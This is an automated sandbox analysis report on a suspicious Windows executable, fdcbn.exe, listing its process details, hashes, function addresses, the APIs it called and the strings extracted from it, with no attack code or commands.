Analysis Process: fdcbn.exe PID: 4872 Parent PID: 4640

General

Start time:	10:23:35
Start date:	25/01/2021
Path:	C:\otrgh\sdgvjk\fdcbn.exe
Wow64 process (32bit):	false
Commandline:	'C:\otrgh\sdgvjk\fdcbn.exe'
Imagebase:	0x7ff7645b0000
File size:	742003 bytes
MD5 hash:	DC74FAE0ADA0A2426E77588E3797E040
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: fdcbn.exe PID: 5384 Parent PID: 4872

General

Start time:	10:23:41
Start date:	25/01/2021
Path:	C:\otrgh\sdgvjk\fdcbn.exe
Wow64 process (32bit):	false
Commandline:	'C:\otrgh\sdgvjk\fdcbn.exe'
Imagebase:	0x7ff7645b0000
File size:	742003 bytes
MD5 hash:	DC74FAE0ADA0A2426E77588E3797E040
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: fdcbn.exe PID: 4872 Parent PID: 4640 fdcbn.exeCOMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.8%
Total number of Nodes:	250
Total number of Limit Nodes:	10

Executed Functions

Function 00007FF7645C2AF0, Relevance: 2.0, APIs: 1, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c87331c0881569db75b19522a25c1094bb3e97912cb1928a03d6313d9c7b85a
Instruction ID: ec9bca5b482bd27e750f9c8a3f1dd247763d0c82a48163552db06522816208cf
Opcode Fuzzy Hash: 1c87331c0881569db75b19522a25c1094bb3e97912cb1928a03d6313d9c7b85a
Instruction Fuzzy Hash: 8D223B22B0C646C7DA38AE16A4E03BDB7E1AB84354F94553DE55E47BD6CE2CD8048F70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF764607E74, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7646065C9,?,?,00001AFB4450AA70,00007FF764607DA5,?,?,?,?,00007FF76460C60E,?,?,00000000), ref: 00007FF764607EC9

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a848e5b76b04e00eb80e14f843c19a73d01effaed5581444aff6cfb2a45b3c67
Instruction ID: 7eadf6d5c431bed65b8804d118051b4c106fa1f5b206da945cf17e8221021c60
Opcode Fuzzy Hash: a848e5b76b04e00eb80e14f843c19a73d01effaed5581444aff6cfb2a45b3c67
Instruction Fuzzy Hash: F4F04954B1A207C1FE597E679A993B5D2935F98F81FCC4431890E862C2EE6CAC814230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF764607FE0, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF76460C5F5,?,?,00000000,00007FF764609E0B,?,?,?,00007FF764604C4F,?,?,?,00007FF764604E85), ref: 00007FF76460801E

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e560f71d711a42c921ed84ded2670af9cf3bdff0e3df86ac959cba17ee8e59ba
Instruction ID: 72d427114c67c2fdb53402e2d7477a392291a55681c4fc68d2bbacaa31e24205
Opcode Fuzzy Hash: e560f71d711a42c921ed84ded2670af9cf3bdff0e3df86ac959cba17ee8e59ba
Instruction Fuzzy Hash: 0BF01210B19603C1FE55BE775AD9275E2925F44FB1FC84634DD2F863D1DE6CA8415130

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7645FF090, Relevance: 21.2, Strings: 16, Instructions: 1215COMMON

Download Yara Rule

Strings

8kw, xrefs: 00007FF7645FFEA4
m$, xrefs: 00007FF764600406
m$, xrefs: 00007FF7645FF942
", xrefs: 00007FF7645FF444
m$, xrefs: 00007FF7645FF10B
_'`, xrefs: 00007FF7646006DD
_'`, xrefs: 00007FF7645FFAD4
8kw, xrefs: 00007FF7645FFB75
", xrefs: 00007FF7645FFDB3
_'`, xrefs: 00007FF7645FFA4F
fXX/, xrefs: 00007FF7645FF3B9
", xrefs: 00007FF7645FFA82
_'`, xrefs: 00007FF7646006A8
8kw, xrefs: 00007FF7645FF578
fXX/, xrefs: 00007FF7645FF370
m$, xrefs: 00007FF7645FF11F

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: 8kw$8kw$8kw$fXX/$fXX/$m$$m$$m$$m$$"$"$"$_'`$_'`$_'`$_'`
API String ID: 0-2240776620
Opcode ID: 523e2701aab27cf7409d3b749ef667c0892d8a874a1d31b72cb2c71531813be0
Instruction ID: 3f012708029cf6a9cd60df54f977ca941f436cc6bb54e6d999c09311488f9fd5
Opcode Fuzzy Hash: 523e2701aab27cf7409d3b749ef667c0892d8a874a1d31b72cb2c71531813be0
Instruction Fuzzy Hash: 62B23936A0D281CBDA789F29A5D067EF7E2DB85304F54003AD69A87FD5DA2CD841CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645E4F70, Relevance: 18.2, Strings: 13, Instructions: 1903COMMON

Download Yara Rule

Strings

VoFH, xrefs: 00007FF7645E634B
Z&P, xrefs: 00007FF7645E5835
0ah[, xrefs: 00007FF7645E5144
wqn, xrefs: 00007FF7645E5E77
1ah[, xrefs: 00007FF7645E65A3
Z&P, xrefs: 00007FF7645E5F11
vqn, xrefs: 00007FF7645E52C5
1ah[, xrefs: 00007FF7645E5CBD
@, xrefs: 00007FF7645E705C
1ah[, xrefs: 00007FF7645E6239
VoFH, xrefs: 00007FF7645E5B1E
wqn, xrefs: 00007FF7645E52DD
wqn, xrefs: 00007FF7645E69F0

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: 0ah[$1ah[$1ah[$1ah[$@$VoFH$VoFH$vqn$wqn$wqn$wqn$Z&P$Z&P
API String ID: 0-976493462
Opcode ID: 4d842f51b37ac6528e37aaf4ff80dd3c470563f7162ff4ba5b5de4bbcc2c35e2
Instruction ID: 840c44b5e86a407be8d378415a82731003a8099afe29f3e9c5a84badb0f77cdb
Opcode Fuzzy Hash: 4d842f51b37ac6528e37aaf4ff80dd3c470563f7162ff4ba5b5de4bbcc2c35e2
Instruction Fuzzy Hash: A4033B26B08286CBEB6C9F7684E03BD7791EF44354FA4013ADA0F4BBD6CE2C99418755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B8800, Relevance: 17.0, APIs: 8, Strings: 3, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}NN, xrefs: 00007FF7645B89D8
|NN, xrefs: 00007FF7645B88F0
}NN, xrefs: 00007FF7645B8969

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: |NN$}NN$}NN
API String ID: 0-3985159218
Opcode ID: b734ec7cdc21db5007f651ec29c333b3b6802e37ba45ee6c4a8f7dde44e99af9
Instruction ID: 5f3dd0a7c708e2609fc7f468de29ad9ec5189a1affa8a6c68cf091931f167d17
Opcode Fuzzy Hash: b734ec7cdc21db5007f651ec29c333b3b6802e37ba45ee6c4a8f7dde44e99af9
Instruction Fuzzy Hash: 85122D36A0C743C7E6289F1690F013DB3E2AF94790FA45639E95E477E5CE3CE8448612

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B9C00, Relevance: 10.3, Strings: 8, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F2?, xrefs: 00007FF7645B9EC7
I8, xrefs: 00007FF7645BA01D
F2?, xrefs: 00007FF7645B9EB7
F2?, xrefs: 00007FF7645B9CDD
F2?, xrefs: 00007FF7645B9CF1
I8, xrefs: 00007FF7645B9C27
F2?, xrefs: 00007FF7645B9DEC
I8, xrefs: 00007FF7645B9DE1

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: I8$I8$I8$F2?$F2?$F2?$F2?$F2?
API String ID: 0-1409480241
Opcode ID: ab074b1ef08b8673696a6721944cb53423c8ac9a1abc800326301b6e894b7611
Instruction ID: a386a36b5462bd472e9b1977ac5c134611dc68bb1a8df1cbacbf0ee293b71b11
Opcode Fuzzy Hash: ab074b1ef08b8673696a6721944cb53423c8ac9a1abc800326301b6e894b7611
Instruction Fuzzy Hash: F1A15EA6B0D102C7EA61DE2B98D047DB3D1AFD1720FA58631D914C72E5CA3CEC429B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF764607818, Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF764607891
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7646078A9
RtlVirtualUnwind.KERNEL32 ref: 00007FF7646078E4
IsDebuggerPresent.KERNEL32 ref: 00007FF76460791D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF764607927
UnhandledExceptionFilter.KERNEL32 ref: 00007FF764607932

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b501a94b0c30ddd3ed342116c16bde973fb161cf99d96f5608dad720b87bbcde
Instruction ID: 12839781a987f7ae13af2995e6edea04d4d44f111348091598d3b9d2fae7b0cf
Opcode Fuzzy Hash: b501a94b0c30ddd3ed342116c16bde973fb161cf99d96f5608dad720b87bbcde
Instruction Fuzzy Hash: 48317432608F81C6D764DF2AE8846AEB3A5FB84B55F900136EA9D43B95DF3CC545C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BB780, Relevance: 7.6, Strings: 6, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OY>m, xrefs: 00007FF7645BB840
3a*c%eUg, xrefs: 00007FF7645BB91C
PY>m, xrefs: 00007FF7645BB870
PY>m, xrefs: 00007FF7645BB837
Pi^k, xrefs: 00007FF7645BB92B
lm, xrefs: 00007FF7645BB933

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: 3a*c%eUg$OY>m$PY>m$PY>m$Pi^k$lm
API String ID: 0-628547131
Opcode ID: ba3b8414c5dcf767e0dfa7b6adefc33b7c8e6bff351b12595a6cb83dcc1093b8
Instruction ID: df9d9abe7ec3ececb57b3c15836721495932a5a7d105204b5b80ecc5322fdcc9
Opcode Fuzzy Hash: ba3b8414c5dcf767e0dfa7b6adefc33b7c8e6bff351b12595a6cb83dcc1093b8
Instruction Fuzzy Hash: 6C41492271824587EB14AF2AB8D176BB6A1AFC1B94F944135FE8D87B95CE3CD4428B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B7350, Relevance: 6.8, Strings: 5, Instructions: 566
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&i, xrefs: 00007FF7645B77F1
&i, xrefs: 00007FF7645B7745
&i, xrefs: 00007FF7645B7800
&i, xrefs: 00007FF7645B7778
&i, xrefs: 00007FF7645B7530

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: &i$&i$&i$&i$&i
API String ID: 0-708512779
Opcode ID: 09509fada7147cf04c46f04f285c91236162227e14fe6f9cb9a8b95d3f3aa6e0
Instruction ID: c4e6ed2116b439eb9262d8c854e52babda6432b6ea3beb6e45990d2ec51bdf9d
Opcode Fuzzy Hash: 09509fada7147cf04c46f04f285c91236162227e14fe6f9cb9a8b95d3f3aa6e0
Instruction Fuzzy Hash: 41222A26F18602C6FB28BF7AA4F537E67A2EB59794F500139DD1E07BD6CE2C94428710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B32A0, Relevance: 6.7, Strings: 5, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6E, xrefs: 00007FF7645B38FA
6E, xrefs: 00007FF7645B3508
6E, xrefs: 00007FF7645B34A0
6E, xrefs: 00007FF7645B33DA
6E, xrefs: 00007FF7645B348C

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: 6E$6E$6E$6E$6E
API String ID: 0-3297435000
Opcode ID: f1b48199b8f6b236142ae86e24071aabd76b38c27eaf9d1adc6721592e89fbd7
Instruction ID: d4b5796809989e7a15ce7349d3aa6c2249b8ccfa168ae753e6a94b03779ce599
Opcode Fuzzy Hash: f1b48199b8f6b236142ae86e24071aabd76b38c27eaf9d1adc6721592e89fbd7
Instruction Fuzzy Hash: 7CF11862F04202CBFB28ABB7A4E177E67A1AB55758F500039DE0EA7FD2DD3C99418710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BB980, Relevance: 5.5, Strings: 4, Instructions: 483COMMON

Download Yara Rule

Strings

U]zL, xrefs: 00007FF7645BBB3B
T]zL, xrefs: 00007FF7645BBA17
U]zL, xrefs: 00007FF7645BBF7E
U]zL, xrefs: 00007FF7645BBE8D

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: T]zL$U]zL$U]zL$U]zL
API String ID: 0-2926435357
Opcode ID: b07e433c66f0f01446dd3b4d79b87c932f8ee47d7bfc10b5f3c31559f7a256e9
Instruction ID: 9afc99922abbfb69a2d81adcf03dfd6a00c2dc5c2038df6d66d5e1169927132d
Opcode Fuzzy Hash: b07e433c66f0f01446dd3b4d79b87c932f8ee47d7bfc10b5f3c31559f7a256e9
Instruction Fuzzy Hash: 81027926B0D54ACBEA686E3AA4F133DB2929FC5350FA44535E91FC7AE5CE1DEC018610

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BAC30, Relevance: 5.3, Strings: 4, Instructions: 262COMMON

Download Yara Rule

Strings

wTwd, xrefs: 00007FF7645BAF74
wTwd, xrefs: 00007FF7645BADF6
vTwd, xrefs: 00007FF7645BAD2B
wTwd, xrefs: 00007FF7645BAD4C

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: vTwd$wTwd$wTwd$wTwd
API String ID: 0-3342006220
Opcode ID: 6b7a60781cbb3e6bd4b76f746d5eaa2d6323e13f91b713b8ea5fd330cec93e31
Instruction ID: b22e8139f2b7bb6bf8ac67518467f5dbb106a1185a4238eed483afe5e121aaf0
Opcode Fuzzy Hash: 6b7a60781cbb3e6bd4b76f746d5eaa2d6323e13f91b713b8ea5fd330cec93e31
Instruction Fuzzy Hash: A2918C37F08145DBDA519F2EA8C002DF392ABD0760FE58231EA58C77E5CA2DEC469B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C2330, Relevance: 4.1, Strings: 3, Instructions: 321COMMON

Download Yara Rule

Strings

.;:, xrefs: 00007FF7645C24B8
.;:, xrefs: 00007FF7645C2677
.;:, xrefs: 00007FF7645C25DB

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: .;:$.;:$.;:
API String ID: 0-3582265319
Opcode ID: 82a8d34c0d556f6f0db020b6204a242b4a16fce40fa484e9913518dde42fb704
Instruction ID: 7e912763ddcba8171ea61e9399e24d5fe54cf7ef2e3ee86da969f1f8a923b0c1
Opcode Fuzzy Hash: 82a8d34c0d556f6f0db020b6204a242b4a16fce40fa484e9913518dde42fb704
Instruction Fuzzy Hash: 3ED13D21A1C745C7DA38AF1AA0D42BEE7A0EF80B54F545139FA4E07BA5CE7CD4808F61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645E92D0, Relevance: 4.0, Strings: 3, Instructions: 279COMMON

Download Yara Rule

Strings

,5UG, xrefs: 00007FF7645E92FD
,5UG, xrefs: 00007FF7645E9615
,5UG, xrefs: 00007FF7645E93C1

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: ,5UG$,5UG$,5UG
API String ID: 0-675831717
Opcode ID: e68fad0a689f0246bbfdcaa26279e81d96fb3218d4206283ea12e6dda52d8921
Instruction ID: 36e63ccd2df45b89d44ad7757d955f4cba10120d686f207fdb0a7274b9c4fc9c
Opcode Fuzzy Hash: e68fad0a689f0246bbfdcaa26279e81d96fb3218d4206283ea12e6dda52d8921
Instruction Fuzzy Hash: 27A14C7670C202CBEB149E2A99C002DB6D2BFD8350FA88532D95DC72E5CA3DEC45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BA080, Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

44w, xrefs: 00007FF7645BA282
44w, xrefs: 00007FF7645BA0DB
44w, xrefs: 00007FF7645BA0C8

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: 44w$44w$44w
API String ID: 0-3007227283
Opcode ID: 980d25a81e3d910786fbceb76ce9b94e2a217e7d6efe4aacfdb0208db9b28d91
Instruction ID: d2e02315e2090ad24763226c6b46c0470c9ce8ba5b063503c84b5724ef30a6d8
Opcode Fuzzy Hash: 980d25a81e3d910786fbceb76ce9b94e2a217e7d6efe4aacfdb0208db9b28d91
Instruction Fuzzy Hash: 78917C72F0C506DBDA249E2AA8D053DF6D2AB81350FA8C531E958C73F6D93DEC41AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BB050, Relevance: 4.0, Strings: 3, Instructions: 240COMMON

Download Yara Rule

Strings

t:b, xrefs: 00007FF7645BB1E7
t:b, xrefs: 00007FF7645BB130
t:b, xrefs: 00007FF7645BB3FD

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: t:b$t:b$t:b
API String ID: 0-810174569
Opcode ID: 7b306665ca124b3de91fee6b380d5bc802ca874535412f593734861fa86cfd93
Instruction ID: 0f7660a7c8af5708169cac834e43e1f78dc2998dae8dfee1360b6070cde07a9f
Opcode Fuzzy Hash: 7b306665ca124b3de91fee6b380d5bc802ca874535412f593734861fa86cfd93
Instruction Fuzzy Hash: 88919E6290C946DED61EFE2695E023DF3D2AF81360F449630DA2E43BE5DBBCE6058710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645FE210, Relevance: 4.0, Strings: 3, Instructions: 230COMMON

Download Yara Rule

Strings

C}, xrefs: 00007FF7645FE270
D}, xrefs: 00007FF7645FE29C
D}, xrefs: 00007FF7645FE24C

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: C}$D}$D}
API String ID: 0-1906828564
Opcode ID: 5f74f428007807354c5e064e7b98a79646a7b49637bcd705ac47e58b8f2840c0
